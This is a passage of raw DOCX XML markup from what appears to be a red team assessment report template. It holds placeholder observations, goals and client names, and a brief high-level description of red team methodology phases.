          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Goal </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00BB134D">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>x</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB134D">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t> ]</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="22603507" w14:textId="77777777" w:rsidR="00BB134D" w:rsidRPr="00BB134D" w:rsidRDefault="00BB134D" w:rsidP="00BB134D">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB134D">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
        <w:t>Although Red Team engagements are focused on security weaknesses, several positive observations were made:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FDF133A" w14:textId="77777777" w:rsidR="00BB134D" w:rsidRPr="00BB134D" w:rsidRDefault="00BB134D" w:rsidP="00BB134D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="31"/>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 </w:t>
      </w:r>
      <w:r w:rsidRPr="00BB134D">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Observation </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00BB134D">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB134D">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t> ]</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="0BF16F11" w14:textId="77777777" w:rsidR="00BB134D" w:rsidRPr="00BB134D" w:rsidRDefault="00BB134D" w:rsidP="00BB134D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="31"/>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 </w:t>
      </w:r>
      <w:r w:rsidRPr="00BB134D">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Observation </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00BB134D">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB134D">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t> ]</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="483E8E3B" w14:textId="77777777" w:rsidR="00BB134D" w:rsidRPr="00BB134D" w:rsidRDefault="00BB134D" w:rsidP="00BB134D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="31"/>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 </w:t>
      </w:r>
      <w:r w:rsidRPr="00BB134D">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Observation </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00BB134D">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>x</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB134D">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t> ]</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="22E349F9" w14:textId="77777777" w:rsidR="00BB134D" w:rsidRPr="00BB134D" w:rsidRDefault="00BB134D" w:rsidP="00BB134D">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB134D">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
        <w:t>Specific observations for this assessment are outlined in the “Observations and Recommendations” section of this report. The following list is a brief summary of these observations:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04999573" w14:textId="77777777" w:rsidR="00BB134D" w:rsidRPr="00BB134D" w:rsidRDefault="00BB134D" w:rsidP="00BB134D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="32"/>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 </w:t>
      </w:r>
      <w:r w:rsidRPr="00BB134D">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Observation </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00BB134D">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB134D">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t> ]</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="130714E7" w14:textId="77777777" w:rsidR="00BB134D" w:rsidRPr="00BB134D" w:rsidRDefault="00BB134D" w:rsidP="00BB134D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="32"/>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 </w:t>
      </w:r>
      <w:r w:rsidRPr="00BB134D">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Observation </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00BB134D">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB134D">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t> ]</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="11B99745" w14:textId="77777777" w:rsidR="00BB134D" w:rsidRPr="00BB134D" w:rsidRDefault="00BB134D" w:rsidP="00BB134D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="32"/>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 </w:t>
      </w:r>
      <w:r w:rsidRPr="00BB134D">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Observation </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00BB134D">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>x</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB134D">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t> ]</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="17ECF222" w14:textId="77777777" w:rsidR="00BB134D" w:rsidRPr="00BB134D" w:rsidRDefault="00BB134D" w:rsidP="00BB134D">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB134D">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
        <w:t>A summary of goals and objectives achieved by [ </w:t>
      </w:r>
      <w:r w:rsidRPr="00BB134D">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
        <w:t xml:space="preserve">Red </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00BB134D">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
        <w:t>Team</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB134D">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
        <w:t> ]</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00BB134D">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
        <w:t> include the following:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7811C170" w14:textId="77777777" w:rsidR="00BB134D" w:rsidRPr="00BB134D" w:rsidRDefault="00BB134D" w:rsidP="00BB134D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="33"/>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 </w:t>
      </w:r>
      <w:r w:rsidRPr="00BB134D">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Goal 1 </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00BB134D">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Results</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB134D">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t> ]</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="5C36E3A4" w14:textId="77777777" w:rsidR="00BB134D" w:rsidRPr="00BB134D" w:rsidRDefault="00BB134D" w:rsidP="00BB134D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="33"/>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 </w:t>
      </w:r>
      <w:r w:rsidRPr="00BB134D">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Goal 2 </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00BB134D">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Results</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB134D">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t> ]</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="40C7F174" w14:textId="77777777" w:rsidR="00BB134D" w:rsidRPr="00BB134D" w:rsidRDefault="00BB134D" w:rsidP="00BB134D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="33"/>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 </w:t>
      </w:r>
      <w:r w:rsidRPr="00BB134D">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Goal x </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00BB134D">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Results</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB134D">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t> ]</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="5186D80A" w14:textId="77777777" w:rsidR="00BB134D" w:rsidRPr="00BB134D" w:rsidRDefault="00BB134D" w:rsidP="00BB134D">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB134D">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
        <w:t>[ </w:t>
      </w:r>
      <w:r w:rsidRPr="00BB134D">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
        <w:t xml:space="preserve">Red </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00BB134D">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
        <w:t>Team</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB134D">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
        <w:t> ]</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00BB134D">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
        <w:t> has provided specific recommendations for reducing the risks imposed by these issues in the “Observations and Recommendations” section of this report. [ </w:t>
      </w:r>
      <w:r w:rsidRPr="00BB134D">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
        <w:t xml:space="preserve">Red </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00BB134D">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
        <w:t>Team</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB134D">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
        <w:t> ]</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00BB134D">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
        <w:t> appreciates the opportunity to support [ </w:t>
      </w:r>
      <w:r w:rsidRPr="00BB134D">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
        <w:t>CLIENT NAME</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB134D">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
        <w:t> ] with its computer security. We look forward to assisting you and the [ </w:t>
      </w:r>
      <w:r w:rsidRPr="00BB134D">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
        <w:t xml:space="preserve">CLIENT </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00BB134D">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
        <w:t>NAME</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB134D">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
        <w:t> ]</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00BB134D">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
        <w:t xml:space="preserve"> IT Staff in future </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00BB134D">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
        <w:t>endeavors</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00BB134D">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D1ADCDD" w14:textId="77777777" w:rsidR="00BB134D" w:rsidRPr="00BB134D" w:rsidRDefault="00BB134D" w:rsidP="00BB134D">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:caps/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB134D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:caps/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>TABLE OF CONTENTS</w:t>
      </w:r>
      <w:hyperlink r:id="rId48" w:anchor="table-of-contents" w:tooltip="Direct link to heading" w:history="1">
        <w:r w:rsidRPr="00BB134D">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:b/>
            <w:bCs/>
            <w:caps/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:t>​</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="4A97CCF9" w14:textId="77777777" w:rsidR="00BB134D" w:rsidRPr="00BB134D" w:rsidRDefault="00BB134D" w:rsidP="00BB134D">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB134D">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
        <w:t>[ </w:t>
      </w:r>
      <w:r w:rsidRPr="00BB134D">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
        <w:t xml:space="preserve">TOC GOES </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00BB134D">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
        <w:t>HERE</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB134D">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
        <w:t> ]</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="3C9F3942" w14:textId="77777777" w:rsidR="00BB134D" w:rsidRPr="00BB134D" w:rsidRDefault="00BB134D" w:rsidP="00BB134D">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:caps/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB134D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:caps/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>METHODOLOGY AND GOALS</w:t>
      </w:r>
      <w:hyperlink r:id="rId49" w:anchor="methodology-and-goals" w:tooltip="Direct link to heading" w:history="1">
        <w:r w:rsidRPr="00BB134D">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:b/>
            <w:bCs/>
            <w:caps/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:t>​</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="436479C9" w14:textId="77777777" w:rsidR="00BB134D" w:rsidRPr="00BB134D" w:rsidRDefault="00BB134D" w:rsidP="00BB134D">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB134D">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
        <w:t>Red Team engagements performed by [ </w:t>
      </w:r>
      <w:r w:rsidRPr="00BB134D">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
        <w:t xml:space="preserve">Red </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00BB134D">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
        <w:t>Team</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB134D">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
        <w:t> ]</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00BB134D">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
        <w:t> employ real-world adversary techniques to target the systems under test. [ </w:t>
      </w:r>
      <w:r w:rsidRPr="00BB134D">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
        <w:t xml:space="preserve">Red </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00BB134D">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
        <w:t>Team</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB134D">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
        <w:t> ]</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00BB134D">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
        <w:t xml:space="preserve"> uses a red team model emulating real adversary tools, techniques and procedures (TTPs) driven by attack scenarios and goals. Unlike a traditional penetration test, the red team model allows for the testing of the entire security scope of an organization to include people, processes and technology. The three major Red Team phases were used during the engagement to accurately emulate a realistic threat. Get In, Stay In, and Act. The sequence of activities in this approach involves </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00BB134D">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
        <w:t>open source</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00BB134D">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
        <w:t xml:space="preserve"> intelligence (OSINT) collection, enumeration, exploitation, and attack. Information gathered during OSINT collection is used in conjunction with passive and active enumeration. Enumeration information typically yields details about specific hardware, services, and software running on remote machines. The next phase involves </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00BB134D">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
        <w:t>analyzing</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00BB134D">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
